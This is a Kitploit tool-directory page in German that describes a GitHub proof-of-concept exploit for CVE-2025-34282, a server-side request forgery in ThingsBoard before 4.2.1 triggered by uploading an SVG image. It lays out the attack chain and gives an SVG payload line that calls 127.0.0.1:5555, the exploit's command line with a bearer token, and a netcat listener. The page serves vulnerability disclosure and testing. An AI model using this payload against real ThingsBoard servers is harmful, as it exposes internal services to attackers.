Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
thingsboard-ssrf-cve-2025-34282 — PoC-Exploit für CVE-2025-34282 - ThingsBoard SSRF über SVG-Bild-Upload | Kitploit
Tools/GitHubGitHub/mathitam/thingsboard-ssrf-cve-2025-34282
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsRed Teaming
GitHubmathitam/thingsboard-ssrf-cve-2025-34282

thingsboard-ssrf-cve-2025-34282

PoC-Exploit für CVE-2025-34282 - ThingsBoard SSRF über SVG-Bild-Upload

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 4 MonatenNoch nicht geprüft

CVE-2025-34282 — ThingsBoard SSRF über SVG-Bild-Upload

Übersicht

Sicherheitslücke zur Server-Side Request Forgery (SSRF) in ThingsBoard IoT-Plattform-Versionen vor 4.2.1.

Ein Angreifer mit Tenant-Admin-Zugriff kann eine manipulierte SVG-Datei mit einer internen URL-Referenz über die Bild-Upload-Galerie hochladen. Wenn ThingsBoard das SVG serverseitig verarbeitet, ruft es die referenzierte URL ab – was den Zugriff auf interne Dienste ermöglicht, die nicht über das Internet erreichbar sind.

FeldDetails
CVECVE-2025-34282
Betroffene Version< 4.2.1
Behobene Version4.2.1
CVSS-Score6.9 Mittel
CWECWE-918 (Server-Side Request Forgery)
Anbieterhttps://thingsboard.io

Angriffskette

  1. Tenant-Admin lädt eine bösartige SVG-Datei über POST /api/image hoch
    • Der Server verarbeitet die SVG-Datei und sendet eine ausgehende Anfrage an die eingebettete URL
  2. Ein benutzerdefiniertes Widget wird erstellt, das den publicLink der SVG über ein <object>-Tag einbettet
    • Das Rendern des Widgets löst ebenfalls den serverseitigen Abruf aus

SVG-Payload

Das ssrf_localhost_5555.svg-Payload bettet eine interne URL-Referenz ein:

root@kitploit:~
<image xlink:href="http://127.0.0.1:5555" x="0" y="0" width="600" height="450" />

Nach dem Hochladen ruft der ThingsBoard-Server http://127.0.0.1:5555 ab, was die SSRF bestätigt.

Verwendung

Voraussetzungen:

root@kitploit:~
pip install requests

Ausführen:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py <svg_file> <bearer_token>

Beispiel:

root@kitploit:~
python thingsboard_4.2.0_ssrf_CVE-2025-34282_exploit.py ssrf_localhost_5555.svg eyJhbGci...

Starten Sie einen Listener, um den SSRF-Callback abzufangen, bevor Sie den Exploit ausführen:

root@kitploit:~
nc -l 5555

Referenzen

  • https://www.cve.org/CVERecord?id=CVE-2025-34282

Autor

Tamil Mathi T.

Tool herunterladen